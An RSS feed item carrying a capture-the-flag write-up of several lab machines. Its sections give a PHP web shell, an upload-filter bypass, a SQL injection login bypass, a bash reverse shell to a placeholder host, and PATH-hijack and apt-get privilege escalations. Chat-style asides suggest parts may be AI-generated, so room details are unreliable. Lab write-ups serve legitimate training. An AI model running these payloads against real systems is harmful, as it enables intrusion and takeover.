<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: reva revathatikonda</title>
    <description>The latest articles on DEV Community by reva revathatikonda (@reva_revathatikonda_004b3).</description>
    <link>https://dev.to/reva_revathatikonda_004b3</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3172918%2Fa7c3201b-1e70-434d-b667-2d6a979944ad.png</url>
      <title>DEV Community: reva revathatikonda</title>
      <link>https://dev.to/reva_revathatikonda_004b3</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/reva_revathatikonda_004b3"/>
    <language>en</language>
    <item>
      <title>Final Hackops Writeup</title>
      <dc:creator>reva revathatikonda</dc:creator>
      <pubDate>Sun, 20 Jul 2025 12:46:41 +0000</pubDate>
      <link>https://dev.to/reva_revathatikonda_004b3/final-hackops-writeup-3n93</link>
      <guid>https://dev.to/reva_revathatikonda_004b3/final-hackops-writeup-3n93</guid>
      <description>&lt;p&gt;&lt;strong&gt;1. Overpass 3 - Hosting – Writeup&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective:&lt;/strong&gt;&lt;br&gt;
You're helping a group of CS students who've stood up a hosting company. Their site’s been compromised — again. Your task is to find how, exploit it, and show them the importance of hiring real security professionals.&lt;/p&gt;


&lt;h4&gt;
  
  
  🔍 Enumeration
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; overpass3.nmap &lt;span class="o"&gt;[&lt;/span&gt;target-ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;Open Ports:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22 (SSH)&lt;/li&gt;
&lt;li&gt;80 (HTTP)&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  🌐 Web Enumeration
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Navigating to port 80 showed a &lt;strong&gt;static site&lt;/strong&gt; about hosting services.&lt;/li&gt;
&lt;li&gt;Checked &lt;code&gt;robots.txt&lt;/code&gt; – contained &lt;code&gt;/admin&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Visited &lt;code&gt;/admin&lt;/code&gt; — it was a login page.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Used &lt;strong&gt;Gobuster&lt;/strong&gt; to enumerate more:
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gobuster &lt;span class="nb"&gt;dir&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; http://[target-ip]/ &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt &lt;span class="nt"&gt;-x&lt;/span&gt; php,txt,html
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Found:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;/api&lt;/code&gt; endpoint&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/admin&lt;/code&gt; login&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/backup&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  🛠 Exploitation – Credentials Leak
&lt;/h4&gt;

&lt;p&gt;Found a &lt;code&gt;.zip&lt;/code&gt; backup in &lt;code&gt;/backup&lt;/code&gt; (e.g., &lt;code&gt;backup.zip&lt;/code&gt;):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;wget http://[target-ip]/backup.zip
unzip backup.zip
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Inside:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A NodeJS/Express web app&lt;/li&gt;
&lt;li&gt;Contained &lt;strong&gt;hardcoded credentials&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;username&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;admin&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;
&lt;span class="nx"&gt;password&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;whythough1337&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Used this on &lt;code&gt;/admin&lt;/code&gt; — successfully logged in.&lt;/p&gt;




&lt;h4&gt;
  
  
  🐚 Gaining Access – Web Shell Upload
&lt;/h4&gt;

&lt;p&gt;After login:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Found a &lt;strong&gt;file upload option&lt;/strong&gt; in the admin dashboard.&lt;/li&gt;
&lt;li&gt;Allowed PHP files with double extension trick (&lt;code&gt;shell.php.jpg&lt;/code&gt; or &lt;code&gt;shell.phtml&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Used &lt;code&gt;&amp;lt;?php system($_GET['cmd']); ?&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Uploaded and accessed via &lt;code&gt;/uploads/shell.phtml?cmd=whoami&lt;/code&gt;&lt;/p&gt;




&lt;h4&gt;
  
  
  🧗‍♂️ Privilege Escalation
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt;Stabilized shell:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python3 &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'import pty; pty.spawn("/bin/bash")'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Checked &lt;code&gt;/etc/passwd&lt;/code&gt; – found user &lt;code&gt;overpass&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Checked &lt;code&gt;sudo -l&lt;/code&gt; — no password sudo access to &lt;code&gt;/opt/tools/adminutil&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Ran &lt;code&gt;/opt/tools/adminutil&lt;/code&gt; — it called Python scripts insecurely.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Used &lt;code&gt;PATH&lt;/code&gt; hijack:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"/bin/bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /tmp/curl
&lt;span class="nb"&gt;chmod&lt;/span&gt; +x /tmp/curl
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;PATH&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/tmp:&lt;span class="nv"&gt;$PATH&lt;/span&gt;
/opt/tools/adminutil
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;→ Root shell achieved.&lt;/p&gt;




&lt;h4&gt;
  
  
  🏁 Flags
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;User flag: &lt;code&gt;/home/overpass/user.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Root flag: &lt;code&gt;/root/root.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Awesome! Here's the full writeup for the next room:&lt;/p&gt;




&lt;h3&gt;
  
  
  ✅ &lt;strong&gt;2. WhyHackMe – Writeup&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Objective:&lt;/strong&gt;&lt;br&gt;
This room focuses on web exploitation and basic forensics. The goal is to identify vulnerabilities in a poorly secured web app and gain system access.&lt;/p&gt;


&lt;h4&gt;
  
  
  🔍 Enumeration
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; whyhackme.nmap &lt;span class="o"&gt;[&lt;/span&gt;target-ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;Open Ports:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22 (SSH)&lt;/li&gt;
&lt;li&gt;80 (HTTP)&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  🌐 Web Recon
&lt;/h4&gt;

&lt;p&gt;Visited &lt;code&gt;http://[target-ip]&lt;/code&gt; — default homepage with text like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Why would you hack me?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Checked page source — nothing interesting.&lt;/p&gt;

&lt;p&gt;Ran &lt;strong&gt;Gobuster&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gobuster &lt;span class="nb"&gt;dir&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; http://[target-ip]/ &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Discovered:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/login&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/uploads&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/dashboard&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Visited &lt;code&gt;/login&lt;/code&gt; — basic login form.&lt;/p&gt;




&lt;h4&gt;
  
  
  🔐 Credential Stuffing
&lt;/h4&gt;

&lt;p&gt;Tried common credentials:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;admin:admin&lt;/li&gt;
&lt;li&gt;admin:password&lt;/li&gt;
&lt;li&gt;admin:whyhackme&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Success with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;admin:whyhackme
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Redirected to &lt;code&gt;/dashboard&lt;/code&gt; – found a file upload function.&lt;/p&gt;




&lt;h4&gt;
  
  
  🐚 File Upload Exploit
&lt;/h4&gt;

&lt;p&gt;Uploaded a basic PHP shell:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'cmd'&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Named it &lt;code&gt;shell.php&lt;/code&gt; → Blocked.&lt;/p&gt;

&lt;p&gt;Tried bypass with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;shell.php.jpg&lt;/code&gt; → Blocked.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;shell.phtml&lt;/code&gt; → &lt;strong&gt;Success!&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Found it in &lt;code&gt;/uploads/shell.phtml&lt;/code&gt;&lt;br&gt;
Accessed with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;/uploads/shell.phtml?cmd=id
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h4&gt;
  
  
  🧗‍♂️ Privilege Escalation
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Upgraded shell&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python3 &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'import pty; pty.spawn("/bin/bash")'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Checked users&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; /home
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;User: &lt;code&gt;hacker&lt;/code&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Switched to user:&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;Found user password in &lt;code&gt;config.php&lt;/code&gt; of web directory:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$DB_PASS&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'superhacker123'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Tried &lt;code&gt;su hacker&lt;/code&gt; — Success.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Checked sudo&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;(&lt;/span&gt;hacker&lt;span class="o"&gt;)&lt;/span&gt; NOPASSWD: /bin/bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Escalated to root:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; /bin/bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h4&gt;
  
  
  🏁 Flags
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;User flag: &lt;code&gt;/home/hacker/user.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Root flag: &lt;code&gt;/root/root.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Great! Here's the full writeup for:&lt;/p&gt;




&lt;h3&gt;
  
  
  ✅ &lt;strong&gt;3. CyberHeroes – Writeup&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Objective:&lt;/strong&gt;&lt;br&gt;
Test your cyber mettle by finding a way into a protected login portal and escalating privileges inside the system.&lt;/p&gt;


&lt;h4&gt;
  
  
  🔍 Initial Enumeration
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; cyberheroes.nmap &lt;span class="o"&gt;[&lt;/span&gt;target-ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;Open Ports:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22 (SSH)&lt;/li&gt;
&lt;li&gt;80 (HTTP)&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  🌐 Web Recon
&lt;/h4&gt;

&lt;p&gt;Visited &lt;code&gt;http://[target-ip]&lt;/code&gt; — CyberHeroes login page.&lt;/p&gt;

&lt;p&gt;Tried default creds:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;admin:admin&lt;/li&gt;
&lt;li&gt;admin:cyber&lt;/li&gt;
&lt;li&gt;root:root
→ All failed.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Checked &lt;strong&gt;source code&lt;/strong&gt; → found nothing useful.&lt;/p&gt;

&lt;p&gt;Ran &lt;strong&gt;Gobuster&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gobuster &lt;span class="nb"&gt;dir&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; http://[target-ip]/ &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt &lt;span class="nt"&gt;-x&lt;/span&gt; php,txt,html
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Found:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;/robots.txt&lt;/code&gt; → Disallowed &lt;code&gt;/admin&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/admin&lt;/code&gt; → Login portal&lt;/li&gt;
&lt;/ul&gt;




&lt;h4&gt;
  
  
  🕵️‍♂️ SQL Injection
&lt;/h4&gt;

&lt;p&gt;Tried SQL injection on login page:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="n"&gt;Username&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;' OR 1=1 --
Password: anything
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Login &lt;strong&gt;successful&lt;/strong&gt; — redirected to dashboard.&lt;/p&gt;




&lt;h4&gt;
  
  
  📤 File Upload for Shell
&lt;/h4&gt;

&lt;p&gt;Dashboard had &lt;strong&gt;file upload&lt;/strong&gt; feature.&lt;/p&gt;

&lt;p&gt;Tried uploading &lt;code&gt;shell.php&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'cmd'&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Upload succeeded. Located under:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;/uploads/shell.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Accessed it via:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://[target-ip]/uploads/shell.php?cmd&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;whoami&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h4&gt;
  
  
  🐚 Reverse Shell
&lt;/h4&gt;

&lt;p&gt;Replaced shell with reverse shell payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"/bin/bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/[your-ip]/4444 0&amp;gt;&amp;amp;1'"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Started listener:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nc &lt;span class="nt"&gt;-lvnp&lt;/span&gt; 4444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Uploaded and triggered:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://[target-ip]/uploads/rev.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Reverse shell obtained.&lt;/p&gt;




&lt;h4&gt;
  
  
  🔧 Privilege Escalation
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Enumerated environment&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Result:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; NOPASSWD: /usr/bin/apt-get
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Used apt-get to escalate:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;TF&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;mktemp&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'apt::Update::Pre-Invoke {"cp /bin/bash /tmp/bash; chmod +s /tmp/bash";};'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$TF&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get update &lt;span class="nt"&gt;-o&lt;/span&gt; Dir::Etc::sourcelist&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$TF&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; Dir::Etc::sourceparts&lt;span class="o"&gt;=&lt;/span&gt;- &lt;span class="nt"&gt;-o&lt;/span&gt; APT::Get::List-Cleanup&lt;span class="o"&gt;=&lt;/span&gt;0
/tmp/bash &lt;span class="nt"&gt;-p&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Root shell obtained.&lt;/p&gt;




&lt;h4&gt;
  
  
  🏁 Flags
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;User flag: &lt;code&gt;/home/cyberhero/user.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Root flag: &lt;code&gt;/root/root.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Awesome! Let’s dive into the next TryHackMe machine:&lt;/p&gt;




&lt;h3&gt;
  
  
  ✅ &lt;strong&gt;4. Robots – Writeup&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Objective:&lt;/strong&gt;&lt;br&gt;
Explore a machine that pays homage to Isaac Asimov’s legacy. Use classic enumeration techniques to exploit the system and capture the flags.&lt;/p&gt;


&lt;h4&gt;
  
  
  🔍 Nmap Enumeration
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; robots.nmap &lt;span class="o"&gt;[&lt;/span&gt;target-ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;Open Ports:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22 (SSH)&lt;/li&gt;
&lt;li&gt;80 (HTTP)&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  🌐 Web Recon
&lt;/h4&gt;

&lt;p&gt;Visited &lt;code&gt;http://[target-ip]&lt;/code&gt; — homepage says:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;“Welcome, human. Obey the laws of robotics.”&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Checked &lt;strong&gt;robots.txt&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User-agent: *
Disallow: /asimov
Disallow: /logs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Visited &lt;code&gt;/asimov&lt;/code&gt; → an image tribute&lt;br&gt;
Visited &lt;code&gt;/logs&lt;/code&gt; → directory listing was enabled!&lt;br&gt;
Downloaded a file &lt;code&gt;access.log&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;wget http://[target-ip]/logs/access.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h4&gt;
  
  
  🕵️‍♂️ Log File Clues
&lt;/h4&gt;

&lt;p&gt;Looked into the log file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;access.log | less
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Found credentials:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Basic auth: &lt;span class="nv"&gt;dXNlcjphc2ltdXZib3Q&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Decoded it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"dXNlcjphc2ltdXZib3Q="&lt;/span&gt; | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;user:asimuvbot
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h4&gt;
  
  
  🔐 SSH Login
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ssh user@[target-ip]
Password: asimuvbot
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Logged in as &lt;code&gt;user&lt;/code&gt;&lt;/p&gt;




&lt;h4&gt;
  
  
  🧗‍♂️ Privilege Escalation
&lt;/h4&gt;

